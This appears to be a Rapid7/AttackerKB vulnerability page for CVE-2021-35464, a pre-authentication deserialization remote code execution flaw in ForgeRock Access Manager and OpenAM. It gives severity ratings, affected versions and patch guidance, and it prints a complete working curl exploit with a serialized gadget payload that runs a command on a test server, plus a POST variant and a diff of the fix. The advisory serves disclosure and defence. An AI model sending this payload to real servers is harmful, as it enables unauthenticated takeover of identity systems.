Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
5

Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)

Disclosure Date: July 22, 2021
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Trivial RCE with a one-line request. Rapid7 Labs is seeing this product in quite a few large enterprises—patch quickly. Shout-out to Portswigger for their excellent write-up: https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

Update July 12, 2021: We now have reliable private reports of exploitation in the wild.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • forgerock

Products

  • am,
  • openam

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis

Threat status: Threat – we now have reliable private reports of exploitation in the wild.
Attacker utility: Remote code execution
Vulnerability class: Deserialization

Description

On Tuesday, June 29, 2021, Portswigger security researcher Michael Stepankin published details on CVE-2021-35464, a pre-authentication remote code execution vulnerability in ForgeRock’s AM identity and access management solution. The vulnerability arises from a Java deserialization flaw in AM’s implementation of the JATO framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system, and public proofs-of-concept are readily available.

ForgeRock AM versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identify Platform’s OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.

Affected products

AM 6.0.0.x
AM 6.5.0.x
6.5.1
6.5.2.x
6.5.3

Guidance

According to the guidance in ForgeRock’s advisory, they are “actively working on patches” for existing versions of ForgeRock Access Manager as of June 29, 2021. Organizations must either upgrade to AM version 7 or above or apply one of several workarounds available—see the advisory for details.

Rapid7 analysis

We expect widespread exploitation to occur quickly. As of June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s AM solution. Rapid7 researchers could easily reproduce RCE against OpenAM using a touch /tmp/vulnerable payload:

wvu@kharak:~$ curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAaryv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ-AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAFXRvdWNoIC90bXAvdnVsbmVyYWJsZQgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjU0MzM1MDQzMjg0NTY3MQEAIEx5c29zZXJpYWwvUHduZXI1NDMzNTA0MzI4NDU2NzE7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA_AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAkAAAB1Mr-ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAUamF2YS5tYXRoLkJpZ0ludGVnZXKM_J8fqTv7HQMABkkACGJpdENvdW50SQAJYml0TGVuZ3RoSQATZmlyc3ROb256ZXJvQnl0ZU51bUkADGxvd2VzdFNldEJpdEkABnNpZ251bVsACW1hZ25pdHVkZXQAAltCeHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw_______________-_____gAAAAF1cQB-ACQAAAABAXh4"
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 7080 (#0)
> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAaryv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ-AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAFXRvdWNoIC90bXAvdnVsbmVyYWJsZQgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjU0MzM1MDQzMjg0NTY3MQEAIEx5c29zZXJpYWwvUHduZXI1NDMzNTA0MzI4NDU2NzE7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA_AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAkAAAB1Mr-ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAUamF2YS5tYXRoLkJpZ0ludGVnZXKM_J8fqTv7HQMABkkACGJpdENvdW50SQAJYml0TGVuZ3RoSQATZmlyc3ROb256ZXJvQnl0ZU51bUkADGxvd2VzdFNldEJpdEkABnNpZ251bVsACW1hZ25pdHVkZXQAAltCeHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw_______________-_____gAAAAF1cQB-ACQAAAABAXh4 HTTP/1.1
> Host: 127.0.0.1:7080
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< X-Frame-Options: SAMEORIGIN
< Cache-Control: private
< Location: http://127.0.0.1:7080/openam/base/AMInvalidURL
< Content-Length: 0
< Date: Tue, 29 Jun 2021 15:59:35 GMT
<
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
wvu@kharak:~$
openam@localhost:/tmp$ ls -l
total 8
drwxr-x--- 2 openam root 4096 Jun 29 15:50 hsperfdata_openam
drwxr-xr-x 1 root   root 4096 Jun 17 00:46 hsperfdata_root
-rw-r----- 1 openam root	0 Jun 29 15:59 vulnerable
openam@localhost:/tmp$

Sending the payload in a POST request also works:

curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>

The ForgeRock AM “patch” (version 7) removes JATO and the legacy endpoints using it:

--- a/WEB-INF/web.xml
+++ b/WEB-INF/web.xml
@@ -45,88 +45,6 @@
     	<listener-class>org.forgerock.openam.identity.idm.AMIdentityRepositoryListenerInitializer</listener-class>
 	</listener>

-	<!-- context param -->
-	<context-param>
-    	<param-name>jato:enforceStrictSessionTimeout</param-name>
-    	<param-value>true</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.authentication.UI.*:moduleURL</param-name>
-    	<param-value>../UI</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:enforceStrictSessionTimeout1</param-name>
-    	<param-value>true</param-value>
-	</context-param>
-
-	<!-- Console context params -->
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.base.*:moduleURL</param-name>
-    	<param-value>../base</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.authentication.*:moduleURL</param-name>
-    	<param-value>../authentication</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.service.*:moduleURL</param-name>
-    	<param-value>../service</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.session.*:moduleURL</param-name>
-    	<param-value>../session</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.realm.*:moduleURL</param-name>
-    	<param-value>../realm</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.policy.*:moduleURL</param-name>
-    	<param-value>../policy</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.idm.*:moduleURL</param-name>
-    	<param-value>../idm</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.user.*:moduleURL</param-name>
-    	<param-value>../user</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.delegation.*:moduleURL</param-name>
-    	<param-value>../delegation</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.agentconfig.*:moduleURL</param-name>
-    	<param-value>../agentconfig</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.task.*:moduleURL</param-name>
-    	<param-value>../task</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.version.*:moduleURL</param-name>
-    	<param-value>../ccversion</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.federation.*:moduleURL</param-name>
-    	<param-value>../federation</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.webservices.*:moduleURL</param-name>
-    	<param-value>../webservices</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.sts.*:moduleURL</param-name>
-    	<param-value>../sts</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.audit.*:moduleURL</param-name>
-    	<param-value>../audit</param-value>
-	</context-param>
-
-	<!-- end console context param -->
-
 	<filter>
     	<filter-name>amSetupFilter</filter-name>
     	<filter-class>com.sun.identity.setup.AMSetupFilter</filter-class>
@@ -141,6 +59,16 @@
         	<param-value>Server</param-value>
     	</init-param>
 	</filter>
+	<filter>
+    	<filter-name>SecureCookieFilter</filter-name>
+    	<filter-class>org.forgerock.openam.headers.SecureCookieFilter</filter-class>
+    	<async-supported>true</async-supported>
+    	<init-param>
+        	<!-- Add any cookies that should be excluded from upgrade to secure cookies here -->
+        	<param-name>excludes</param-name>
+        	<param-value></param-value>
+    	</init-param>
+	</filter>
 	<!--
 	To override the default User-Agent exclusion patterns for SameSite=none cookies, uncomment
 	the following filter definition and update the excluded patterns, one pattern per line -->
@@ -191,6 +119,18 @@
         	<param-value>nosniff</param-value>
     	</init-param>
 	</filter>
+	<filter>
+    	<filter-name>CachePrivate</filter-name>
+    	<filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class>
+    	<init-param>
+        	<param-name>Cache-Control</param-name>
+        	<param-value>private</param-value>
+    	</init-param>
+    	<init-param>
+        	<param-name>excludes</param-name>
